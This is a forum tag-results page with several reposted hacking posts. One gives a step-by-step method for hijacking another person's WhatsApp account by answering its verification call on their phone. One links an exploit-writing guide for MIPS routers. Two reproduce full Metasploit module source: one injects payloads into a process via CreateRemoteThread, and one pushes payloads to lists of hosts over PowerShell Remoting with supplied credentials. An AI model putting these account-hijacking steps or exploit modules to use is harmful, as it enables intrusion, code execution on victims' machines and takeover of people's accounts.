Search the Community
Showing results for tags 'target'.
-
The hugely popular smartphone messaging service WhatsApp, acquired by Facebook for over $20 billion last year, has reportedly been found to be prone to hijacking without unlocking or knowing your device password, making its hundreds of Millions of users vulnerable to, not just hackers, but also non-technical people. This trick lets anyone surrounds you to get effectively control over your WhatsApp account. The attacker needs nothing more than a phone number of the target person and access to the target mobile phone for a few seconds, even if it is locked. Hacking Whatsapp account in such scenario is not hard for your friends and colleagues. This is not actually a loophole or vulnerability in WhatsApp, and rather it is just the way WhatsApp is designed and its account setup mechanism works. NOTE: Moreover, we aren’t encouraging users to hack others WhatsApp account, but the purpose of publishing this article is to warn and remind our readers that you should be extra careful to whom you lend your mobile phone and not to leave it unattended for longer durations with strangers around. The trick enables the offender to get full control over the victim’s WhatsApp account in no time and the most surprising part is that it independently works on all mobile platforms, including Android, Windows and Apple’s iOS. Here’s How to Hijack someone else’s WhatsApp Account? Below are the clear steps to hack the WhatsApp account on any Smartphones: Begin by setting up a WhatsApp account on a new mobile phone using the phone number of your target. During the setup process, WhatsApp will call the target’s phone number and will provide a PIN that needs to be entered for the authentication of the account. If you already have access to the victim’s phone, you can just answer the phone call and grab the code with no efforts. Even if the victim has a lock screen enabled on the phone, you can receive the phone call to get the secret PIN. Using this known and simple trick your colleagues can hijack your WhatsApp Account easily. The worst case is with iPhones: Things get even worse on iPhone if the users have configured their iPhones with Siri authentication for the lock screen, because all the contact details are available to access the Siri’s settings, effectively giving everyone access to their phone number without the need for a PIN. Thus, if you try to steal the account information of WhatsApp, without even having the phone number of the target user, you can just call your number from target’s phone using Siri. Just check the given video demonstration that explains the simple trick of taking control of anyone’s WhatsApp account. Source
-
Developing MIPS Exploits to Hack Routers 1 1. INTRODUCTION 3 2. PREPARING LAB 3 2.1. Running Debian MIPS on QEMU 3 2.2. Cross Compiling for MIPS (bonus section) 4 3. REVERSE ENGINEERING THE BINARY 5 3.1. Obtaining The Target Binary 5 3.2. Getting The Target Running 6 3.3. Setting Up Remote Debugging 8 3.4. Analysing The Vulnerability 9 4. WRITING THE EXPLOIT 10 4.1. Restrictions and Solutions 10 4.2. Finding a Proper ROP Chain 11 4.2. MIPS Shellcoding 14 4.2.1 Writing Fork Shellcode 14 4.2.1 Writing Unlink Shellcode (bonus section) 16 5. CONCLUSION 18 6. References 19 Read more: https://www.exploit-db.com/docs/36806.pdf
-
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Local include Msf::Post::Windows::Runas include Msf::Post::Windows::Priv def initialize(info = {}) super(update_info(info, 'Name' => "Windows Run Command As User", 'Description' => %q{ This module will login with the specified username/password and execute the supplied command as a hidden process. Output is not returned by default. Unless targetting a local user either set the DOMAIN, or specify a UPN user format (e.g. user@domain). This uses the CreateProcessWithLogonW WinAPI function. A custom command line can be sent instead of uploading an executable. APPLICAITON_NAME and COMMAND_LINE are passed to lpApplicationName and lpCommandLine respectively. See the MSDN documentation for how these two values interact. }, 'License' => MSF_LICENSE, 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Author' => ['Kx499', 'Ben Campbell'], 'Targets' => [ [ 'Automatic', { 'Arch' => [ ARCH_X86 ] } ] ], 'DefaultTarget' => 0, 'References' => [ [ 'URL', 'https://msdn.microsoft.com/en-us/library/windows/desktop/ms682431' ] ], 'DisclosureDate' => 'Jan 01 1999' # Not valid but required by msftidy )) register_options( [ OptString.new('DOMAIN', [false, 'Domain to login with' ]), OptString.new('USER', [true, 'Username to login with' ]), OptString.new('PASSWORD', [true, 'Password to login with' ]), OptString.new('APPLICATION_NAME', [false, 'Application to be executed (lpApplicationName)', nil ]), OptString.new('COMMAND_LINE', [false, 'Command line to execute (lpCommandLine)', nil ]), OptBool.new('USE_CUSTOM_COMMAND', [true, 'Specify custom APPLICATION_NAME and COMMAND_LINE', false ]) ], self.class) end def exploit fail_with(Exploit::Failure::BadConfig, 'Must be a meterpreter session') unless session.type == 'meterpreter' fail_with(Exploit::Failure::NoAccess, 'Cannot use this technique as SYSTEM') if is_system? domain = datastore['DOMAIN'] user = datastore['USER'] password = datastore['PASSWORD'] if datastore['USE_CUSTOM_COMMAND'] application_name = datastore['APPLICATION_NAME'] command_line = datastore['COMMAND_LINE'] else command_line = nil windir = get_env('windir') # Select path of executable to run depending the architecture case sysinfo['Architecture'] when /x86/i application_name = "#{windir}\\System32\\notepad.exe" when /x64/i application_name = "#{windir}\\SysWOW64\\notepad.exe" end end pi = create_process_with_logon(domain, user, password, application_name, command_line) return unless pi begin return if datastore['USE_CUSTOM_COMMAND'] vprint_status('Injecting payload into target process') raw = payload.encoded process_handle = pi[:process_handle] virtual_alloc = session.railgun.kernel32.VirtualAllocEx(process_handle, nil, raw.length, 'MEM_COMMIT|MEM_RESERVE', 'PAGE_EXECUTE_READWRITE') address = virtual_alloc['return'] fail_with(Exploit::Failure::Unknown, "Unable to allocate memory in target process: #{virtual_alloc['ErrorMessage']}") if address == 0 write_memory = session.railgun.kernel32.WriteProcessMemory(process_handle, address, raw, raw.length, 4) fail_with(Exploit::Failure::Unknown, "Unable to write memory in target process @ 0x#{address.to_s(16)}: #{write_memory['ErrorMessage']}") unless write_memory['return'] create_remote_thread = session.railgun.kernel32.CreateRemoteThread(process_handle, nil, 0, address, nil, 0, 4) if create_remote_thread['return'] == 0 print_error("Unable to create remote thread in target process: #{create_remote_thread['ErrorMessage']}") else print_good("Started thread in target process") end ensure session.railgun.kernel32.CloseHandle(pi[:process_handle]) session.railgun.kernel32.CloseHandle(pi[:thread_handle]) end end end Source
-
- command_line
- nil
-
(and 3 more)
Tagged with:
-
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::Powershell def initialize(info = {}) super(update_info(info, 'Name' => 'Powershell Remoting Remote Command Execution', 'Description' => %q{ Uses Powershell Remoting (TCP 47001) to inject payloads on target machines. If RHOSTS are specified it will try to resolve the IPs to hostnames, otherwise use a HOSTFILE to supply a list of known hostnames. }, 'License' => MSF_LICENSE, 'Author' => [ 'Ben Campbell' ], 'References' => [ [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default) [ 'OSVDB', '3106'] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'DisclosureDate' => 'Jan 01 1999', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter', 'shell' ], 'Targets' => [ [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ] ], 'DefaultTarget' => 0 )) register_options([ OptString.new('SMBUser', [ false, 'The username to authenticate as' ]), OptString.new('SMBPass', [ false, 'The password for the specified username' ]), OptString.new('SMBDomain', [ false, 'The Windows domain to use for authentication' ]), OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]), OptPath.new('HOSTFILE', [ false, 'Line separated file with hostnames to target' ]), # Move this out of advanced OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener']), OptBool.new("ExitOnSession", [ true, "Return from the exploit after a session has been created", false ]) ]) register_advanced_options( [ OptInt.new("ListenerTimeout", [ false, "The maximum number of seconds to wait for new sessions", 60]) ], self.class) end def exploit if !datastore['ExitOnSession'] && !job_id fail_with(Failure::Unknown, "Setting ExitOnSession to false requires running as a job (exploit -j)") end unless datastore['RHOSTS'] || datastore['HOSTFILE'] fail_with(Failure::BadConfig, "Need RHOSTS or HOSTFILE specified.") end if datastore['SMBUser'] && datastore['SMBPass'].nil? fail_with(Failure::BadConfig, "Need both username and password set.") end if datastore['RHOSTS'] ip_list = "$iplist=" Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |ip| ip_list << "'#{ip}'," end # Remove trailing comma... ip_list = ip_list[0..-2] ip_list << ";" end known_hosts = "" if datastore['HOSTFILE'] ::File.open(datastore['HOSTFILE'], "rb").each_line do |hostname| hostname.strip! known_hosts << "'#{hostname}'," unless hostname.blank? end known_hosts = known_hosts[0..-2] end command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true) ps = <<EOF #{generate_credentials} $ResultList=@(#{known_hosts}); #{ip_list} foreach($ip in $iplist){$Resultlist += [System.Net.Dns]::GetHostbyAddress($ip).HostName}; Invoke-Command -AsJob -ComputerName $ResultList -ScriptBlock { cmd.exe /c start #{command} } EOF if datastore['SMBUser'] ps << " -Credential $creds" end # If the host process terminates too quickly the jobs will die # before they spawn in a new process. ps << ";Sleep 20;" ps.gsub!("\n", "") command = generate_psh_command_line( noprofile: true, windowstyle: 'hidden', command: ps ) print_status("Executing command...") begin cmd_exec(command) rescue Rex::TimeoutError end stime = Time.now.to_f loop do break if session_created? && datastore['ExitOnSession'] break if datastore['ListenerTimeout'].to_i > 0 && (stime + datastore['ListenerTimeout'].to_i < Time.now.to_f) Rex.sleep(1) end print_status("Completed") end def generate_credentials(domain = datastore['SMBDomain'], user = datastore['SMBUser'], pass = datastore['SMBPass']) creds = "" unless user.nil? creds = "$pass=ConvertTo-SecureString -string '#{pass}' -asPlainText -force;"\ "$creds=new-object -typename System.Management.Automation.PSCredential -argumentlist " if domain.nil? creds << "'#{user}'" else creds << "'#{domain}\\#{user}'" end creds << ",$pass;" end creds end end Source